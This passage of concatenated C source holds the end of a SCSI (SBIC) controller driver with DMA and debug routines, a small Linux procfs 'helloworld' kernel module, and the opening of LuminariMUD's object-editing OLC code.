= acb->xs; dev->sc_flags |= SBICF_SELECTED; dev->target = newtarget; dev->lun = newlun; break; } if (acb == NULL) { printf("%s: reselect %s targ %d not in nexus_list %p\n", dev->sc_dev.dv_xname, csr == SBIC_CSR_RSLT_NI ? "NI" : "IFY", newtarget, &dev->nexus_list.tqh_first); panic("bad reselect in sbic"); } if (csr == SBIC_CSR_RSLT_IFY) SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); break; default: abort: /* * Something unexpected happened -- deal with it. */ printf("sbicnextstate: aborting csr %02x asr %02x\n", csr, asr); #ifdef DDB Debugger(); #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); sbicerror(dev, regs, csr); sbicabort(dev, regs, "next"); if (dev->sc_flags & SBICF_INDMA) { /* * check for overlapping cache line, flush if so */ #ifdef M68040 if (dev->sc_flags & SBICF_DCFLUSH) { #if 0 printf("sibc: 68040 DMA cache flush needs fixing? %x:%x\n", dev->sc_xs->data, dev->sc_xs->datalen); #endif } #endif dev->sc_flags &= ~(SBICF_INDMA | SBICF_DCFLUSH); #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); sbic_scsidone(acb, -1); } SBIC_TRACE(dev); return SBIC_STATE_ERROR; } SBIC_TRACE(dev); return(SBIC_STATE_RUNNING); } /* * Check if DMA can not be used with specified buffer */ int sbiccheckdmap(bp, len, mask) void *bp; u_long len, mask; { u_char *buffer; u_long phy_buf; u_long phy_len; buffer = bp; if (len == 0) return(0); while (len) { phy_buf = kvtop(buffer); if (len < (phy_len = NBPG - ((int) buffer & PGOFSET))) phy_len = len; if (phy_buf & mask) return(1); buffer += phy_len; len -= phy_len; } return(0); } int sbictoscsiperiod(dev, regs, a) struct sbic_softc *dev; sbic_regmap_p regs; int a; { unsigned int fs; /* * cycle = DIV / (2*CLK) * DIV = FS+2 * best we can do is 200ns at 20Mhz, 2 cycles */ GET_SBIC_myid(regs,fs); fs = (fs >>6) + 2; /* DIV */ fs = (fs * 10000) / (dev->sc_clkfreq<<1); /* Cycle, in ns */ if (a < 2) a = 8; /* map to Cycles */ return ((fs*a)>>2); /* in 4 ns units */ } int sbicfromscsiperiod(dev, regs, p) struct sbic_softc *dev; sbic_regmap_p regs; int p; { register unsigned int fs, ret; /* Just the inverse of the above */ GET_SBIC_myid(regs,fs); fs = (fs >>6) + 2; /* DIV */ fs = (fs * 10000) / (dev->sc_clkfreq<<1); /* Cycle, in ns */ ret = p << 2; /* in ns units */ ret = ret / fs; /* in Cycles */ if (ret < sbic_min_period) return(sbic_min_period); /* verify rounding */ if (sbictoscsiperiod(dev, regs, ret) < p) ret++; return (ret >= 8) ? 0 : ret; } #ifdef DEBUG void sbicdumpstate() { u_char csr, asr; GET_SBIC_asr(debug_sbic_regs,asr); GET_SBIC_csr(debug_sbic_regs,csr); printf("%s: asr:csr(%02x:%02x)->(%02x:%02x)\n", (routine==1)?"sbicgo": (routine==2)?"sbicintr": (routine==3)?"sbicicmd": (routine==4)?"sbicnext":"unknown", debug_asr, debug_csr, asr, csr); } void sbictimeout(dev) struct sbic_softc *dev; { int s, asr; s = splbio(); if (dev->sc_dmatimo) { if (dev->sc_dmatimo > 1) { printf("%s: dma timeout #%d\n", dev->sc_dev.dv_xname, dev->sc_dmatimo - 1); GET_SBIC_asr(dev->sc_sbicp, asr); if( asr & SBIC_ASR_INT ) { /* We need to service a missed IRQ */ printf("Servicing a missed int:(%02x,%02x)->(%02x,??)\n", debug_asr, debug_csr, asr); sbicintr(dev); } sbicdumpstate(); } dev->sc_dmatimo++; } splx(s); timeout((void *)sbictimeout, dev, 30 * hz); } void sbic_dump_acb(acb) struct sbic_acb *acb; { u_char *b = (u_char *) &acb->cmd; int i; printf("acb@%p ", acb); if (acb->xs == NULL) { printf("<unused>\n"); return; } printf("(%d:%d) flags %2x clen %2d cmd ", acb->xs->sc_link->scsipi_scsi.target, acb->xs->sc_link->scsipi_scsi.lun, acb->flags, acb->clen); for (i = acb->clen; i; --i) printf(" %02x", *b++); printf("\n"); printf(" xs: %8p data %8p:%04x ", acb->xs, acb->xs->data, acb->xs->datalen); printf("va %8p:%04x ", acb->sc_kv.dc_addr, acb->sc_kv.dc_count); printf("pa %8p:%04x tcnt %lx\n", acb->sc_pa.dc_addr, acb->sc_pa.dc_count ,acb->sc_tcnt); } void sbic_dump(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_char csr, asr; struct sbic_acb *acb; int s; int i; s = splbio(); regs = dev->sc_sbicp; #if CSR_TRACE_SIZE printf("csr trace: "); i = csr_traceptr; do { printf("%c%02x%02x%02x ", csr_trace[i].whr, csr_trace[i].csr, csr_trace[i].asr, csr_trace[i].xtn); switch(csr_trace[i].whr) { case 'g': printf("go "); break; case 's': printf("select "); break; case 'y': printf("select+ "); break; case 'i': printf("intr "); break; case 'f': printf("finish "); break; case '>': printf("out "); break; case '<': printf("in "); break; case 'm': printf("msgin "); break; case 'x': printf("msginx "); break; case 'X': printf("msginX "); break; case 'r': printf("reselect "); break; case 'I': printf("icmd "); break; case 'a': printf("abort "); break; default: printf("? "); } switch(csr_trace[i].csr) { case 0x11: printf("INITIATOR"); break; case 0x16: printf("S_XFERRED"); break; case 0x20: printf("MSGIN_ACK"); break; case 0x41: printf("DISC"); break; case 0x42: printf("SEL_TIMEO"); break; case 0x80: printf("RSLT_NI"); break; case 0x81: printf("RSLT_IFY"); break; case 0x85: printf("DISC_1"); break; case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1e: case 0x1f: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2e: case 0x2f: case 0x48: case 0x49: case 0x4a: case 0x4b: case 0x4e: case 0x4f: case 0x88: case 0x89: case 0x8a: case 0x8b: case 0x8e: case 0x8f: switch(csr_trace[i].csr & 0xf0) { case 0x10: printf("DONE_"); break; case 0x20: printf("STOP_"); break; case 0x40: printf("ERR_"); break; case 0x80: printf("REQ_"); break; } switch(csr_trace[i].csr & 7) { case 0: printf("DATA_OUT"); break; case 1: printf("DATA_IN"); break; case 2: printf("CMD"); break; case 3: printf("STATUS"); break; case 6: printf("MSG_OUT"); break; case 7: printf("MSG_IN"); break; default: printf("invld phs"); } break; default: printf("****"); break; } if (csr_trace[i].asr & SBIC_ASR_INT) printf(" ASR_INT"); if (csr_trace[i].asr & SBIC_ASR_LCI) printf(" ASR_LCI"); if (csr_trace[i].asr & SBIC_ASR_BSY) printf(" ASR_BSY"); if (csr_trace[i].asr & SBIC_ASR_CIP) printf(" ASR_CIP"); printf("\n"); i = (i + 1) & (CSR_TRACE_SIZE - 1); } while (i != csr_traceptr); #endif GET_SBIC_asr(regs, asr); if ((asr & SBIC_ASR_INT) == 0) GET_SBIC_csr(regs, csr); else csr = 0; printf("%s@%p regs %p asr %x csr %x\n", dev->sc_dev.dv_xname, dev, regs, asr, csr); if ((acb = dev->free_list.tqh_first)) { printf("Free list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if ((acb = dev->ready_list.tqh_first)) { printf("Ready list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if ((acb = dev->nexus_list.tqh_first)) { printf("Nexus list:\n"); while (acb) { sbic_dump_acb(acb); acb = acb->chain.tqe_next; } } if (dev->sc_nexus) { printf("nexus:\n"); sbic_dump_acb(dev->sc_nexus); } printf("sc_xs %p targ %d lun %d flags %x tcnt %lx dmacmd %x mask %lx\n", dev->sc_xs, dev->target, dev->lun, dev->sc_flags, dev->sc_tcnt, dev->sc_dmacmd, dev->sc_dmamask); for (i = 0; i < 8; ++i) { if (dev->sc_tinfo[i].cmds > 2) { printf("tgt %d: cmds %d disc %d senses %d lubusy %x\n", i, dev->sc_tinfo[i].cmds, dev->sc_tinfo[i].dconns, dev->sc_tinfo[i].senses, dev->sc_tinfo[i].lubusy); } } splx(s); } #endif
600034.c
/* * procfs1.c */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/proc_fs.h> #include <linux/uaccess.h> #include <linux/version.h> #if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 6, 0) #define HAVE_PROC_OPS #endif #define procfs_name "helloworld" static struct proc_dir_entry *our_proc_file; static ssize_t procfile_read(struct file *filePointer, char __user *buffer, size_t buffer_length, loff_t *offset) { char s[13] = "HelloWorld!\n"; int len = sizeof(s); ssize_t ret = len; if (*offset >= len || copy_to_user(buffer, s, len)) { pr_info("copy_to_user failed\n"); ret = 0; } else { pr_info("procfile read %s\n", filePointer->f_path.dentry->d_name.name); *offset += len; } return ret; } #ifdef HAVE_PROC_OPS static const struct proc_ops proc_file_fops = { .proc_read = procfile_read, }; #else static const struct file_operations proc_file_fops = { .read = procfile_read, }; #endif static int __init procfs1_init(void) { our_proc_file = proc_create(procfs_name, 0644, NULL, &proc_file_fops); if (NULL == our_proc_file) { proc_remove(our_proc_file); pr_alert("Error:Could not initialize /proc/%s\n", procfs_name); return -ENOMEM; } pr_info("/proc/%s created\n", procfs_name); return 0; } static void __exit procfs1_exit(void) { proc_remove(our_proc_file); pr_info("/proc/%s removed\n", procfs_name); } module_init(procfs1_init); module_exit(procfs1_exit); MODULE_LICENSE("GPL");
440266.c
/************************************************************************** * File: oedit.c Part of LuminariMUD * * Usage: Oasis OLC - Objects. * * * * By Levork. Copyright 1996 Harvey Gilpin. 1997-2001 George Greer. * **************************************************************************/ #include "conf.h" #include "sysdep.h" #include "structs.h" #include "utils.h" #include "comm.h" #include "interpreter.h" #include "spells.h" #include "db.h" #include "boards.h" #include "constants.h" #include "shop.h" #include "genolc.h" #include "genobj.h" #include "genzon.h" #include "oasis.h" #include "improved-edit.h" #include "dg_olc.h" #include "fight.h" #include "modify.h" #include "clan.h" #include "craft.h" #include "spec_abilities.h" #include "feats.h" #include "assign_wpn_armor.h" #include "domains_schools.h" #include "treasure.h" /* set_weapon_object */ #include "act.h" /* get_eq_score() */ /* local functions */ static void oedit_disp_size_menu(struct descriptor_data *d); static void oedit_setup_new(struct descriptor_data *d); static void oedit_disp_container_flags_menu(struct descriptor_data *d); static void oedit_disp_extradesc_menu(struct descriptor_data *d); static void oedit_disp_weapon_spells(struct descriptor_data *d); static void oedit_disp_prompt_apply_menu(struct descriptor_data *d); //static void oedit_disp_apply_spec_menu(struct descriptor_data *d); static void oedit_liquid_type(struct descriptor_data *d); static void oedit_disp_apply_menu(struct descriptor_data *d); //static void oedit_disp_weapon_menu(struct descriptor_data *d); static void oedit_disp_spells_menu(struct descriptor_data *d); static void oedit_disp_val1_menu(struct descriptor_data *d); static void oedit_disp_val2_menu(struct descriptor_data *d); static void oedit_disp_val3_menu(struct descriptor_data *d); static void oedit_disp_val4_menu(struct descriptor_data *d); static void oedit_disp_val5_menu(struct descriptor_data *d); //static void oedit_disp_prof_menu(struct descriptor_data *d); static void oedit_disp_mats_menu(struct descriptor_data *d); static void oedit_disp_type_menu(struct descriptor_data *d); static void oedit_disp_extra_menu(struct descriptor_data *d); static void oedit_disp_wear_menu(struct descriptor_data *d); static void oedit_disp_menu(struct descriptor_data *d); static void oedit_disp_perm_menu(struct descriptor_data *d); static void oedit_save_to_disk(int zone_num); static void oedit_disp_spellbook_menu(struct descriptor_data *d); static void oedit_disp_weapon_special_abilities_menu(struct descriptor_data *d); static void oedit_disp_assign_weapon_specab_menu(struct descriptor_data *d); /* handy macro */ #define S_PRODUCT(s, i) ((s)->producing[(i)]) /* Utility and exported functions */ ACMD(do_oasis_oedit) { int number = NOWHERE, save = 0, real_num; struct descriptor_data *d; char *buf3; char buf1[MAX_STRING_LENGTH]; char buf2[MAX_STRING_LENGTH]; /* No building as a mob or while being forced. */ if (IS_NPC(ch) || !ch->desc || STATE(ch->desc) != CON_PLAYING) return; /* Parse any arguments. */ buf3 = two_arguments(argument, buf1, buf2); /* If there aren't any arguments they can't modify anything. */ if (!*buf1) { send_to_char(ch, "Specify an object VNUM to edit.\r\n"); return; } else if (!isdigit(*buf1)) { if (str_cmp("save", buf1) != 0) { send_to_char(ch, "Yikes! Stop that, someone will get hurt!\r\n"); return; } save = TRUE; if (is_number(buf2)) number = atoi(buf2); else if (GET_OLC_ZONE(ch) > 0) { zone_rnum zlok; if ((zlok = real_zone(GET_OLC_ZONE(ch))) == NOWHERE) number = NOWHERE; else number = genolc_zone_bottom(zlok); } if (number == NOWHERE) { send_to_char(ch, "Save which zone?\r\n"); return; } } /* If a numeric argument was given, get it. */ if (number == NOWHERE) number = atoi(buf1); /* Check that whatever it is isn't already being edited. */ for (d = descriptor_list; d; d = d->next) { if (STATE(d) == CON_OEDIT) { if (d->olc && OLC_NUM(d) == number) { send_to_char(ch, "That object is currently being edited by %s.\r\n", PERS(d->character, ch)); return; } } } /* Point d to the builder's descriptor (for easier typing later). */ d = ch->desc; /* Give the descriptor an OLC structure. */ if (d->olc) { mudlog(BRF, LVL_IMMORT, TRUE, "SYSERR: do_oasis: Player already had olc structure."); free(d->olc); } CREATE(d->olc, struct oasis_olc_data, 1); /* Find the zone. */ OLC_ZNUM(d) = save ? real_zone(number) : real_zone_by_thing(number); if (OLC_ZNUM(d) == NOWHERE) { send_to_char(ch, "Sorry, there is no zone for that number!\r\n"); /* Free the descriptor's OLC structure. */ free(d->olc); d->olc = NULL; return; } /* Everyone but IMPLs can only edit zones they have been assigned. */ if (!can_edit_zone(ch, OLC_ZNUM(d))) { send_cannot_edit(ch, zone_table[OLC_ZNUM(d)].number); /* Free the OLC structure. */ free(d->olc); d->olc = NULL; return; } /* If we need to save, save the objects. */ if (save) { send_to_char(ch, "Saving all objects in zone %d.\r\n", zone_table[OLC_ZNUM(d)].number); mudlog(CMP, MAX(LVL_BUILDER, GET_INVIS_LEV(ch)), TRUE, "OLC: %s saves object info for zone %d.", GET_NAME(ch), zone_table[OLC_ZNUM(d)].number); /* Save the objects in this zone. */ save_objects(OLC_ZNUM(d)); /* Free the descriptor's OLC structure. */ free(d->olc); d->olc = NULL; return; } OLC_NUM(d) = number; /* If a new object, setup new, otherwise setup the existing object. */ if ((real_num = real_object(number)) != NOTHING) oedit_setup_existing(d, real_num); else oedit_setup_new(d); oedit_disp_menu(d); STATE(d) = CON_OEDIT; /* Send the OLC message to the players in the same room as the builder. */ act("$n starts using OLC.", TRUE, d->character, 0, 0, TO_ROOM); SET_BIT_AR(PLR_FLAGS(ch), PLR_WRITING); /* Log the OLC message. */ mudlog(CMP, LVL_IMMORT, TRUE, "OLC: %s starts editing zone %d allowed zone %d", GET_NAME(ch), zone_table[OLC_ZNUM(d)].number, GET_OLC_ZONE(ch)); } static void oedit_setup_new(struct descriptor_data *d) { CREATE(OLC_OBJ(d), struct obj_data, 1); clear_object(OLC_OBJ(d)); OLC_OBJ(d)->name = strdup("unfinished object"); OLC_OBJ(d)->description = strdup("An unfinished object is lying here."); OLC_OBJ(d)->short_description = strdup("an unfinished object"); SET_BIT_AR(GET_OBJ_WEAR(OLC_OBJ(d)), ITEM_WEAR_TAKE); GET_OBJ_BOUND_ID(OLC_OBJ(d)) = NOBODY; OLC_VAL(d) = 0; OLC_ITEM_TYPE(d) = OBJ_TRIGGER; GET_OBJ_MATERIAL(OLC_OBJ(d)) = 0; GET_OBJ_PROF(OLC_OBJ(d)) = 0; GET_OBJ_SIZE(OLC_OBJ(d)) = SIZE_MEDIUM; SCRIPT(OLC_OBJ(d)) = NULL; OLC_OBJ(d)->proto_script = OLC_SCRIPT(d) = NULL; OLC_SPECAB(d) = NULL; } void oedit_setup_existing(struct descriptor_data *d, int real_num) { struct obj_data *obj; /* Allocate object in memory. */ CREATE(obj, struct obj_data, 1); copy_object(obj, &obj_proto[real_num]); /* Attach new object to player's descriptor. */ OLC_OBJ(d) = obj; OLC_VAL(d) = 0; OLC_ITEM_TYPE(d) = OBJ_TRIGGER; dg_olc_script_copy(d); /* The edited obj must not have a script. It will be assigned to the updated * obj later, after editing. */ SCRIPT(obj) = NULL; OLC_OBJ(d)->proto_script = NULL; } void oedit_save_internally(struct descriptor_data *d) { int i; obj_rnum robj_num; struct descriptor_data *dsc; struct obj_data *obj; i = (real_object(OLC_NUM(d)) == NOTHING); if ((robj_num = add_object(OLC_OBJ(d), OLC_NUM(d))) == NOTHING) { log("oedit_save_internally: add_object failed."); return; } /* Update triggers and free old proto list */ if (obj_proto[robj_num].proto_script && obj_proto[robj_num].proto_script != OLC_SCRIPT(d)) free_proto_script(&obj_proto[robj_num], OBJ_TRIGGER); /* this will handle new instances of the object: */ obj_proto[robj_num].proto_script = OLC_SCRIPT(d); /* this takes care of the objects currently in-game */ for (obj = object_list; obj; obj = obj->next) { if (obj->item_number != robj_num) continue; /* remove any old scripts */ if (SCRIPT(obj)) extract_script(obj, OBJ_TRIGGER); free_proto_script(obj, OBJ_TRIGGER); copy_proto_script(&obj_proto[robj_num], obj, OBJ_TRIGGER); assign_triggers(obj, OBJ_TRIGGER); } /* end trigger update */ if (!i) /* If it's not a new object, don't renumber. */ return; /* Renumber produce in shops being edited. */ for (dsc = descriptor_list; dsc; dsc = dsc->next) if (STATE(dsc) == CON_SEDIT) for (i = 0; S_PRODUCT(OLC_SHOP(dsc), i) != NOTHING; i++) if (S_PRODUCT(OLC_SHOP(dsc), i) >= robj_num) S_PRODUCT(OLC_SHOP(dsc), i) ++; /* Update other people in zedit too. From: C.Raehl 4/27/99 */ for (dsc = descriptor_list; dsc; dsc = dsc->next) if (STATE(dsc) == CON_ZEDIT) for (i = 0; OLC_ZONE(dsc)->cmd[i].command != 'S'; i++) switch (OLC_ZONE(dsc)->cmd[i].command) { case 'P': OLC_ZONE(dsc)->cmd[i].arg3 += (OLC_ZONE(dsc)->cmd[i].arg3 >= robj_num); /* Fall through. */ case 'E': case 'G': case 'O': OLC_ZONE(dsc)->cmd[i].arg1 += (OLC_ZONE(dsc)->cmd[i].arg1 >= robj_num); break; case 'R': OLC_ZONE(dsc)->cmd[i].arg2 += (OLC_ZONE(dsc)->cmd[i].arg2 >= robj_num); break; default: break; } } static void oedit_save_to_disk(int zone_num) { save_objects(zone_num); } void oedit_disp_weapon_spells(struct descriptor_data *d) { char buf[MAX_INPUT_LENGTH]; int counter; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_WEAPON_SPELLS; counter++) { snprintf(buf, sizeof(buf), "[%s%d%s] Spell: %s%20s%s Level: %s%3d%s Percent: %s%3d%s Combat: %s%3d%s\r\n", cyn, counter + 1, nrm, cyn, spell_info[OLC_OBJ(d)->wpn_spells[counter].spellnum].name, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].level, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].percent, nrm, cyn, OLC_OBJ(d)->wpn_spells[counter].inCombat, nrm); send_to_char(d->character, buf); } send_to_char(d->character, "Enter spell to edit : "); } static void oedit_disp_lootbox_levels(struct descriptor_data *d) { write_to_output(d, "This will determine the maximum bonus to be found on the items in the chest.\r\n" "Please choose the maximum grade of equipment that can drop from this chest.\r\n" "1) Mundane\r\n" "2) Minor (level 10 or less)\r\n" "3) Typical(level 15 or less)\r\n" "4) Medium (level 20 or less)\r\n" "5) Major (level 25 or less)\r\n" "6) Superior (level 26 or higher)\r\n" "\r\nYour Choice: "); } static void oedit_disp_lootbox_types(struct descriptor_data *d) { write_to_output(d, "The type guarantees one item of the specified type.\r\n" "Generic has equal chance for any type. Gold provides 5x as much money.\r\n" "Please choose the type of lootbox you'd like to create:\r\n" "1) Generic, equal chance for all item types.\r\n" "2) Weapons, guaranteed weapon, low chance for other items.\r\n" "3) Armor, guaranteed armor, low chance for other items.\r\n" "4) Consumables, guaranteed at least one consumable, low chance for other items.\r\n" "5) Trinkets, guaranteed trinket (rings, bracers, etc), low chance for other items.\r\n" "6) Gold, much more gold, low chance for other items.\r\n" "7) Crystal, garaunteed arcanite crystal, low chance for other items.\r\n" "\r\nYour Choice: "); } /* Menu functions */ /* For container flags. */ static void oedit_disp_container_flags_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; get_char_colors(d->character); clear_screen(d); sprintbit(GET_OBJ_VAL(OLC_OBJ(d), 1), container_bits, bits, sizeof(bits)); write_to_output(d, "%s1%s) CLOSEABLE\r\n" "%s2%s) PICKPROOF\r\n" "%s3%s) CLOSED\r\n" "%s4%s) LOCKED\r\n" "Container flags: %s%s%s\r\n" "Enter flag, 0 to quit : ", grn, nrm, grn, nrm, grn, nrm, grn, nrm, cyn, bits, nrm); } /* For extra descriptions. */ static void oedit_disp_extradesc_menu(struct descriptor_data *d) { struct extra_descr_data *extra_desc = OLC_DESC(d); get_char_colors(d->character); clear_screen(d); write_to_output(d, "Extra desc menu\r\n" "%s1%s) Keywords: %s%s\r\n" "%s2%s) Description:\r\n%s%s\r\n" "%s3%s) Goto next description: %s\r\n" "%s0%s) Quit\r\n" "Enter choice : ", grn, nrm, yel, (extra_desc->keyword && *extra_desc->keyword) ? extra_desc->keyword : "<NONE>", grn, nrm, yel, (extra_desc->description && *extra_desc->description) ? extra_desc->description : "<NONE>", grn, nrm, !extra_desc->next ? "Not set." : "Set.", grn, nrm); OLC_MODE(d) = OEDIT_EXTRADESC_MENU; } /* Ask for the bonus type for this apply. */ static void oedit_disp_apply_prompt_bonus_type_menu(struct descriptor_data *d) { int i = 0; for (i = 0; i < NUM_BONUS_TYPES; i++) { write_to_output(d, " %s%2d%s) %-20s", nrm, i, nrm, bonus_types[i]); if (((i + 1) % 3) == 0) write_to_output(d, "\r\n"); } write_to_output(d, "\r\nEnter the bonus type for this affect : "); OLC_MODE(d) = OEDIT_APPLY_BONUS_TYPE; } /* Ask for *which* apply to edit. */ static void oedit_disp_prompt_apply_menu(struct descriptor_data *d) { char apply_buf[MAX_STRING_LENGTH]; int counter; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_OBJ_AFFECT; counter++) { if (OLC_OBJ(d)->affected[counter].modifier) { sprinttype(OLC_OBJ(d)->affected[counter].location, apply_types, apply_buf, sizeof(apply_buf)); if (OLC_OBJ(d)->affected[counter].location == APPLY_FEAT) { write_to_output(d, " %s%d%s) Grant Feat %s (%s)\r\n", grn, counter + 1, nrm, feat_list[(OLC_OBJ(d)->affected[counter].modifier < NUM_FEATS && OLC_OBJ(d)->affected[counter].modifier > 0 ? OLC_OBJ(d)->affected[counter].modifier : 0)] .name, bonus_types[OLC_OBJ(d)->affected[counter].bonus_type]); } else { write_to_output(d, " %s%d%s) %+d to %s (%s)\r\n", grn, counter + 1, nrm, OLC_OBJ(d)->affected[counter].modifier, apply_buf, bonus_types[OLC_OBJ(d)->affected[counter].bonus_type]); } } else { write_to_output(d, " %s%d%s) None.\r\n", grn, counter + 1, nrm); } } write_to_output(d, "\r\nEnter affection to modify (0 to quit) : "); OLC_MODE(d) = OEDIT_PROMPT_APPLY; } void oedit_disp_prompt_spellbook_menu(struct descriptor_data *d) { int counter, columns, i, u = 0; clear_screen(d); for (i = 1; i <= 9; i++) { columns = 0; write_to_output(d, "%s", !(columns % 3) ? "\r\n" : ""); write_to_output(d, "---Circle %d Spells---===============================================---\r\n", i); for (counter = 0; counter < SPELLBOOK_SIZE; counter++) { if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname != 0 && OLC_OBJ(d)->sbinfo[counter].spellname < MAX_SPELLS && ((spell_info[OLC_OBJ(d)->sbinfo[counter].spellname].min_level[CLASS_WIZARD] + 1) / 2) == i) { write_to_output(d, " %3d) %-20.20s %s", counter + 1, spell_info[OLC_OBJ(d)->sbinfo[counter].spellname].name, !(++columns % 3) ? "\r\n" : ""); u++; } } } u++; if (u > SPELLBOOK_SIZE) { write_to_output(d, "\r\nEnter spell slot to modify (0 to quit) : "); } else { write_to_output(d, "\r\nEnter spell slot to modify [ next empty slot is %2d ] (0 to quit) : ", u); } OLC_MODE(d) = OEDIT_PROMPT_SPELLBOOK; } void oedit_disp_spellbook_menu(struct descriptor_data *d) { int counter, columns, i; clear_screen(d); for (i = 1; i <= 9; i++) { columns = 0; write_to_output(d, "%s", !(columns % 3) ? "\n" : ""); write_to_output(d, "---Circle %d Spells---==============================================---\r\n", i); for (counter = 0; counter < NUM_SPELLS; counter++) { if (((spell_info[counter].min_level[CLASS_WIZARD] + 1) / 2) == i && spell_info[counter].schoolOfMagic != NOSCHOOL) write_to_output(d, "%3d) %-20.20s%s", counter, spell_info[counter].name, !(++columns % 3) ? "\r\n" : ""); } } write_to_output(d, "\r\nEnter spell number (0 is no spell) : "); OLC_MODE(d) = OEDIT_SPELLBOOK; } static void oedit_disp_weapon_special_abilities_menu(struct descriptor_data *d) { struct obj_special_ability *specab; bool found = FALSE; char actmtds[MAX_STRING_LENGTH]; int counter = 0; get_char_colors(d->character); clear_screen(d); write_to_output(d, "Weapon special abilities menu\r\n"); for (specab = OLC_OBJ(d)->special_abilities; specab != NULL; specab = specab->next) { counter++; found = TRUE; sprintbit(specab->activation_method, activation_methods, actmtds, MAX_STRING_LENGTH); write_to_output(d, "%s%d%s) Ability: %s%s%s Level: %s%d%s\r\n" " Activation Methods: %s%s%s\r\n" " CommandWord: %s%s%s\r\n" " Values: [%s%d%s] [%s%d%s] [%s%d%s] [%s%d%s]\r\n", grn, counter, nrm, yel, special_ability_info[specab->ability].name, nrm, yel, specab->level, nrm, yel, actmtds, nrm, yel, (specab->command_word == NULL ? "Not set." : specab->command_word), nrm, yel, specab->value[0], nrm, yel, specab->value[1], nrm, yel, specab->value[2], nrm, yel, specab->value[3], nrm); } if (!found) write_to_output(d, "No weapon special abilities assigned.\r\n"); write_to_output(d, "\r\n" "%sN%s) Assign a new ability\r\n" "%sE%s) Edit an assigned ability\r\n" "%sD%s) Delete an assigned ability\r\n" "%sQ%s) Quit\r\n" "Enter choice : ", grn, nrm, grn, nrm, grn, nrm, grn, nrm); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; } static void oedit_disp_assign_weapon_specab_menu(struct descriptor_data *d) { struct obj_special_ability *specab; char actmtds[MAX_STRING_LENGTH]; specab = OLC_SPECAB(d); if (specab == NULL) { write_to_output(d, "Could not retrieve new weapon special ability. Exiting.\r\n"); oedit_disp_menu(d); return; } get_char_colors(d->character); clear_screen(d); write_to_output(d, "Weapon special abilities menu\r\n"); sprintbit(OLC_SPECAB(d)->activation_method, activation_methods, actmtds, MAX_STRING_LENGTH); write_to_output(d, "%sA%s) Ability: %s%s%s\r\n" "%sL%s) Level: %s%d%s\r\n" "%sM%s) Activation Methods: %s%s%s\r\n" "%sC%s) Command Word: %s%s%s\r\n" "%sV%s) Values: [%s%d%s] [%s%d%s] [%s%d%s] [%s%d%s]\r\n" "%sQ%s) Quit\r\n" "Enter Choice : ", grn, nrm, yel, special_ability_info[specab->ability].name, nrm, grn, nrm, yel, specab->level, nrm, grn, nrm, yel, actmtds, nrm, grn, nrm, yel, (specab->command_word == NULL ? "Not set." : specab->command_word), nrm, grn, nrm, yel, specab->value[0], nrm, yel, specab->value[1], nrm, yel, specab->value[2], nrm, yel, specab->value[3], nrm, grn, nrm); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; } static void oedit_weapon_specab(struct descriptor_data *d) { const char *specab_names[NUM_SPECABS - 1]; /* We are ignoring the first, 0 value. */ int i = 0; get_char_colors(d->character); clear_screen(d); /* we want to use column_list here, but we don't have a pre made list * of string values. Make one, and make sure it is in order. */ for (i = 0; i < NUM_SPECABS - 1; i++) { specab_names[i] = special_ability_info[i + 1].name; } column_list(d->character, 0, specab_names, NUM_SPECABS - 1, TRUE); write_to_output(d, "\r\n%sEnter weapon special ability : ", nrm); OLC_MODE(d) = OEDIT_WEAPON_SPECAB; } static void oedit_disp_specab_activation_method_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ACTIVATION_METHODS; counter++) { /* added the -3 to prevent eyes/ears/badge */ write_to_output(d, "%s%d%s) %-20.20s %s", grn, counter + 1, nrm, activation_methods[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbit(OLC_SPECAB(d)->activation_method, activation_methods, bits, MAX_STRING_LENGTH); write_to_output(d, "\r\nActivation Methods: %s%s%s\r\n" "Enter Activation Method, 0 to quit : ", cyn, bits, nrm); } void oedit_disp_specab_bane_race(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_RACE_TYPES; counter++) { write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel, race_family_types[counter], !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\n%sEnter race number : ", nrm); } void oedit_disp_specab_bane_subrace(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_SUB_RACES; counter++) { write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel, npc_subrace_types[counter], !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\n%sEnter subrace number : ", nrm); } /* Menu for APPLY_FEAT */ #if 0 void oedit_disp_apply_spec_menu(struct descriptor_data *d) { char *buf; int i, count = 0; switch (OLC_OBJ(d)->affected[OLC_VAL(d)].location) { case APPLY_FEAT: for (i = 0; i < NUM_FEATS; i++) { if (feat_list[i].in_game) { count++; write_to_output(d, "%s%3d%s) %s%-14.14s ", grn, i, nrm, yel, feat_list[i].name); if (count 